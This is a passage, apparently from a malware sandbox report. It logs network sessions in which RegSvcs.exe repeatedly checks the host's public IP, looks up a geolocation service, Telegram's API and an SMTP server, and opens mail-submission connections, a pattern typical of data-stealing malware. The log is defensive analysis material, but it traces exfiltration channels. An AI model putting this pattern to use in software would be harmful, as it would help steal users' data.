                                                  Sep 18, 2024 15:26:31.248635054 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:31.248863935 CEST49732587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:31.253777027 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:31.403965950 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:31.409096956 CEST49732587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:31.414763927 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:31.579674959 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:31.580048084 CEST49732587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:31.584983110 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:31.740420103 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:31.740645885 CEST49732587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:31.745482922 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:31.896560907 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:31.896810055 CEST49732587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:31.901649952 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:31.914226055 CEST8049735132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:31.915527105 CEST49736443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:31.915581942 CEST44349736188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:31.915663958 CEST49736443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:31.915915966 CEST49736443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:31.915927887 CEST44349736188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:31.957099915 CEST4973580192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:32.392853975 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:32.393096924 CEST49732587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:32.394371986 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:32.394438982 CEST49732587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:32.398363113 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:32.402188063 CEST44349736188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:32.405505896 CEST49736443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:32.405538082 CEST44349736188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:32.531363964 CEST44349736188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:32.531619072 CEST44349736188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:32.531718016 CEST49736443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:32.540601015 CEST49736443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:32.544545889 CEST4973580192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:32.546030045 CEST4973780192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:32.549065113 CEST58749732208.91.198.143192.168.2.7
Timestamp                             Source Port  Dest Port  Source IP    Dest IP
Sep 18, 2024 15:26:01.900065899 CEST  51732        53         192.168.2.7  1.1.1.1
Sep 18, 2024 15:26:01.907663107 CEST  53           51732      1.1.1.1      192.168.2.7
Sep 18, 2024 15:26:04.108913898 CEST  64324        53         192.168.2.7  1.1.1.1
Sep 18, 2024 15:26:04.118988037 CEST  53           64324      1.1.1.1      192.168.2.7
Sep 18, 2024 15:26:21.328557968 CEST  58481        53         192.168.2.7  1.1.1.1
Sep 18, 2024 15:26:21.335287094 CEST  53           58481      1.1.1.1      192.168.2.7
Sep 18, 2024 15:26:28.147953033 CEST  64865        53         192.168.2.7  1.1.1.1
Sep 18, 2024 15:26:28.157243967 CEST  53           64865      1.1.1.1      192.168.2.7
Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                      Type            Class        DNS over HTTPS
Sep 18, 2024 15:26:01.900065899 CEST  192.168.2.7  1.1.1.1  0xb130    Standard query (0)  checkip.dyndns.org        A (IP address)  IN (0x0001)  false
Sep 18, 2024 15:26:04.108913898 CEST  192.168.2.7  1.1.1.1  0x17fa    Standard query (0)  reallyfreegeoip.org       A (IP address)  IN (0x0001)  false
Sep 18, 2024 15:26:21.328557968 CEST  192.168.2.7  1.1.1.1  0x5cfc    Standard query (0)  api.telegram.org          A (IP address)  IN (0x0001)  false
Sep 18, 2024 15:26:28.147953033 CEST  192.168.2.7  1.1.1.1  0xc0c3    Standard query (0)  us2.smtp.mailhostbox.com  A (IP address)  IN (0x0001)  false
Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name                      CName               Address          Type                    Class        DNS over HTTPS
Sep 18, 2024 15:26:01.907663107 CEST  1.1.1.1    192.168.2.7  0xb130    No error (0)  checkip.dyndns.org        checkip.dyndns.com  -                CNAME (Canonical name)  IN (0x0001)  false
Sep 18, 2024 15:26:01.907663107 CEST  1.1.1.1    192.168.2.7  0xb130    No error (0)  checkip.dyndns.com        -                   132.226.8.169    A (IP address)          IN (0x0001)  false
Sep 18, 2024 15:26:01.907663107 CEST  1.1.1.1    192.168.2.7  0xb130    No error (0)  checkip.dyndns.com        -                   193.122.130.0    A (IP address)          IN (0x0001)  false
Sep 18, 2024 15:26:01.907663107 CEST  1.1.1.1    192.168.2.7  0xb130    No error (0)  checkip.dyndns.com        -                   193.122.6.168    A (IP address)          IN (0x0001)  false
Sep 18, 2024 15:26:01.907663107 CEST  1.1.1.1    192.168.2.7  0xb130    No error (0)  checkip.dyndns.com        -                   132.226.247.73   A (IP address)          IN (0x0001)  false
Sep 18, 2024 15:26:01.907663107 CEST  1.1.1.1    192.168.2.7  0xb130    No error (0)  checkip.dyndns.com        -                   158.101.44.242   A (IP address)          IN (0x0001)  false
Sep 18, 2024 15:26:04.118988037 CEST  1.1.1.1    192.168.2.7  0x17fa    No error (0)  reallyfreegeoip.org       -                   188.114.96.3     A (IP address)          IN (0x0001)  false
Sep 18, 2024 15:26:04.118988037 CEST  1.1.1.1    192.168.2.7  0x17fa    No error (0)  reallyfreegeoip.org       -                   188.114.97.3     A (IP address)          IN (0x0001)  false
Sep 18, 2024 15:26:21.335287094 CEST  1.1.1.1    192.168.2.7  0x5cfc    No error (0)  api.telegram.org          -                   149.154.167.220  A (IP address)          IN (0x0001)  false
Sep 18, 2024 15:26:28.157243967 CEST  1.1.1.1    192.168.2.7  0xc0c3    No error (0)  us2.smtp.mailhostbox.com  -                   208.91.198.143   A (IP address)          IN (0x0001)  false
Sep 18, 2024 15:26:28.157243967 CEST  1.1.1.1    192.168.2.7  0xc0c3    No error (0)  us2.smtp.mailhostbox.com  -                   208.91.199.225   A (IP address)          IN (0x0001)  false
Sep 18, 2024 15:26:28.157243967 CEST  1.1.1.1    192.168.2.7  0xc0c3    No error (0)  us2.smtp.mailhostbox.com  -                   208.91.199.223   A (IP address)          IN (0x0001)  false
Sep 18, 2024 15:26:28.157243967 CEST  1.1.1.1    192.168.2.7  0xc0c3    No error (0)  us2.smtp.mailhostbox.com  -                   208.91.199.224   A (IP address)          IN (0x0001)  false
                                                  • reallyfreegeoip.org
                                                  • api.telegram.org
                                                  • checkip.dyndns.org
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.7  49699        132.226.8.169   80                3636  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                             Bytes transferred  Direction  Data
Sep 18, 2024 15:26:01.919477940 CEST  151                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Sep 18, 2024 15:26:03.721055031 CEST  272                IN         HTTP/1.1 200 OK
    Date: Wed, 18 Sep 2024 13:26:03 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 18, 2024 15:26:03.776456118 CEST  127                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Sep 18, 2024 15:26:04.072740078 CEST  272                IN         HTTP/1.1 200 OK
    Date: Wed, 18 Sep 2024 13:26:03 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 18, 2024 15:26:04.800056934 CEST  127                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Sep 18, 2024 15:26:05.072067022 CEST  272                IN         HTTP/1.1 200 OK
    Date: Wed, 18 Sep 2024 13:26:04 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.7  49702        132.226.8.169   80                3636  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                             Bytes transferred  Direction  Data
Sep 18, 2024 15:26:05.704499006 CEST  127                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Sep 18, 2024 15:26:06.548098087 CEST  272                IN         HTTP/1.1 200 OK
    Date: Wed, 18 Sep 2024 13:26:06 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.7  49704        132.226.8.169   80                3636  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                             Bytes transferred  Direction  Data
Sep 18, 2024 15:26:07.315989017 CEST  151                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Sep 18, 2024 15:26:09.107950926 CEST  272                IN         HTTP/1.1 200 OK
    Date: Wed, 18 Sep 2024 13:26:08 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.7  49706        132.226.8.169   80                3636  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                             Bytes transferred  Direction  Data
Sep 18, 2024 15:26:09.786983013 CEST  151                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Sep 18, 2024 15:26:10.813437939 CEST  272                IN         HTTP/1.1 200 OK
    Date: Wed, 18 Sep 2024 13:26:10 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.7  49708        132.226.8.169   80                3636  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                             Bytes transferred  Direction  Data
Sep 18, 2024 15:26:11.410947084 CEST  151                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Sep 18, 2024 15:26:12.510083914 CEST  272                IN         HTTP/1.1 200 OK
    Date: Wed, 18 Sep 2024 13:26:12 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.7  49710        132.226.8.169   80                3636  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                             Bytes transferred  Direction  Data
Sep 18, 2024 15:26:13.114567041 CEST  151                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Sep 18, 2024 15:26:14.195511103 CEST  272                IN         HTTP/1.1 200 OK
    Date: Wed, 18 Sep 2024 13:26:14 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.7  49712        132.226.8.169   80                3636  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                             Bytes transferred  Direction  Data
Sep 18, 2024 15:26:15.117073059 CEST  151                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Sep 18, 2024 15:26:16.954744101 CEST  272                IN         HTTP/1.1 200 OK
    Date: Wed, 18 Sep 2024 13:26:16 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.7  49713        132.226.8.169   80                6480  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                             Bytes transferred  Direction  Data
Sep 18, 2024 15:26:15.709748983 CEST  151                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Sep 18, 2024 15:26:16.720835924 CEST  272                IN         HTTP/1.1 200 OK
    Date: Wed, 18 Sep 2024 13:26:16 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 18, 2024 15:26:16.724096060 CEST  127                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Sep 18, 2024 15:26:17.050405025 CEST  272                IN         HTTP/1.1 200 OK
    Date: Wed, 18 Sep 2024 13:26:16 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 18, 2024 15:26:17.734843016 CEST  127                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Sep 18, 2024 15:26:18.010059118 CEST  272                IN         HTTP/1.1 200 OK
    Date: Wed, 18 Sep 2024 13:26:17 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 49718 | 132.226.8.169 | 80 | 3636 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Sep 18, 2024 15:26:17.620682001 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Sep 18, 2024 15:26:20.705919981 CEST | 272 | IN | HTTP/1.1 200 OK
    Date: Wed, 18 Sep 2024 13:26:19 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 18, 2024 15:26:20.706355095 CEST | 272 | IN | HTTP/1.1 200 OK
    Date: Wed, 18 Sep 2024 13:26:19 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 18, 2024 15:26:20.706764936 CEST | 272 | IN | HTTP/1.1 200 OK
    Date: Wed, 18 Sep 2024 13:26:19 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.7 | 49722 | 132.226.8.169 | 80 | 6480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Sep 18, 2024 15:26:18.631155968 CEST | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Sep 18, 2024 15:26:19.577594995 CEST | 272 | IN | HTTP/1.1 200 OK
    Date: Wed, 18 Sep 2024 13:26:19 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.7 | 49725 | 132.226.8.169 | 80 | 6480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Sep 18, 2024 15:26:20.873878956 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Sep 18, 2024 15:26:23.318131924 CEST | 272 | IN | HTTP/1.1 200 OK
    Date: Wed, 18 Sep 2024 13:26:23 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.7 | 49728 | 132.226.8.169 | 80 | 6480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Sep 18, 2024 15:26:23.978149891 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Sep 18, 2024 15:26:25.426209927 CEST | 272 | IN | HTTP/1.1 200 OK
    Date: Wed, 18 Sep 2024 13:26:25 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.7 | 49730 | 132.226.8.169 | 80 | 6480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Sep 18, 2024 15:26:26.041965008 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Sep 18, 2024 15:26:27.814801931 CEST | 272 | IN | HTTP/1.1 200 OK
    Date: Wed, 18 Sep 2024 13:26:27 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.7 | 49733 | 132.226.8.169 | 80 | 6480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Sep 18, 2024 15:26:28.448720932 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Sep 18, 2024 15:26:30.499630928 CEST | 272 | IN | HTTP/1.1 200 OK
    Date: Wed, 18 Sep 2024 13:26:30 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.7 | 49735 | 132.226.8.169 | 80 | 6480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Sep 18, 2024 15:26:31.112776041 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Sep 18, 2024 15:26:31.914226055 CEST | 272 | IN | HTTP/1.1 200 OK
    Date: Wed, 18 Sep 2024 13:26:31 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.7 | 49737 | 132.226.8.169 | 80 | 6480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Sep 18, 2024 15:26:32.551311016 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Sep 18, 2024 15:26:34.453485966 CEST | 272 | IN | HTTP/1.1 200 OK
